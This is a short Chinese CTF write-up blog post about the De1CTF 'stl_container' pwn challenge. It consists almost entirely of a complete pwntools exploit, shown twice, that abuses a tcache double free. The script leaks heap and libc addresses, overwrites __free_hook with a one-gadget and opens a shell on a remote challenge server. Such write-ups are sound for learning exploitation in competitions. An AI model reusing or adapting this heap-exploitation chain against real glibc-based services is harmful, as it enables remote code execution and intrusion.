2020-05-06

De1CTF

爆0选手一号准备就绪,菜鸟打不动De1CTF

stl_container

只做了一个签到题,作为一个签到选手,mips不会做,安卓也不会,连游戏MC也没玩过,只能做一个签到题才能勉强更新出这一页(其实半页都没有
题目不难,tcache结构下,在free(2,0)处可以两次free

from pwn import*
def new(ch,content):
	p.sendlineafter('>>',str(ch))
	p.sendlineafter('>>','1')
	p.sendafter('data:',content)
def free(ch,index):
	p.sendlineafter('>>',str(ch))
	p.sendlineafter('>>','2')
	if ch!=4 and ch !=3:
		p.sendlineafter('index?',str(index))
def show(ch,index):
	p.sendlineafter('>>',str(ch))
	p.sendlineafter('>>','3')
	if ch!=4 and ch!=3:
		p.sendlineafter('index?',str(index))
context.log_level ='DEBUG'
p = process('./main')
p = remote('134.175.239.26',8848)
libc =ELF('./libc-2.27.so')
new(3,'\x00'*0x80 + p64(0) + p64(0xA1))
new(1,'FMYY')
new(1,'FMYY')
new(2,'FMYY')
free(2,0)
new(2,'\xB0')
show(2,0)
p.recvuntil('data: ')
heap_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - 0x124B0
log.info('HEAP:\t' + hex(heap_base))
new(2,'FMYY')
new(3,'FMYY')
new(4,'FMYY')
new(4,'\x00'*0x50 + p64(0) + p64(0x41))
free(2,0)
free(2,0)
new(2,p64(heap_base + 0x125E0))
new(2,p64(0) + p64(0x421))
free(1,0)
new(1,'FMYY')
show(1,0)
p.recvuntil('data: ')
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x60 -0x10 - libc.sym['__malloc_hook']
log.info('LIBC:\t' + hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
rce = libc_base + 0x4F322
free(2,0)
free(2,0)
new(2,p64(free_hook))
new(2,p64(rce))
p.interactive()

下载

MAIN EXP LIBC

1	from pwn import*
2	def new(ch,content):
3	p.sendlineafter('>>',str(ch))
4	p.sendlineafter('>>','1')
5	p.sendafter('data:',content)
6	def free(ch,index):
7	p.sendlineafter('>>',str(ch))
8	p.sendlineafter('>>','2')
9	if ch!=4 and ch !=3:
10	p.sendlineafter('index?',str(index))
11	def show(ch,index):
12	p.sendlineafter('>>',str(ch))
13	p.sendlineafter('>>','3')
14	if ch!=4 and ch!=3:
15	p.sendlineafter('index?',str(index))
16	context.log_level ='DEBUG'
17	p = process('./main')
18	p = remote('134.175.239.26',8848)
19	libc =ELF('./libc-2.27.so')
20	new(3,'\x00'*0x80 + p64(0) + p64(0xA1))
21	new(1,'FMYY')
22	new(1,'FMYY')
23	new(2,'FMYY')
24	free(2,0)
25	new(2,'\xB0')
26	show(2,0)
27	p.recvuntil('data: ')
28	heap_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - 0x124B0
29	log.info('HEAP:\t' + hex(heap_base))
30	new(2,'FMYY')
31	new(3,'FMYY')
32	new(4,'FMYY')
33	new(4,'\x00'*0x50 + p64(0) + p64(0x41))
34	free(2,0)
35	free(2,0)
36	new(2,p64(heap_base + 0x125E0))
37	new(2,p64(0) + p64(0x421))
38	free(1,0)
39	new(1,'FMYY')
40	show(1,0)
41	p.recvuntil('data: ')
42	libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x60 -0x10 - libc.sym['__malloc_hook']
43	log.info('LIBC:\t' + hex(libc_base))
44	free_hook = libc_base + libc.sym['__free_hook']
45	rce = libc_base + 0x4F322
46	free(2,0)
47	free(2,0)
48	new(2,p64(free_hook))
49	new(2,p64(rce))
50	p.interactive()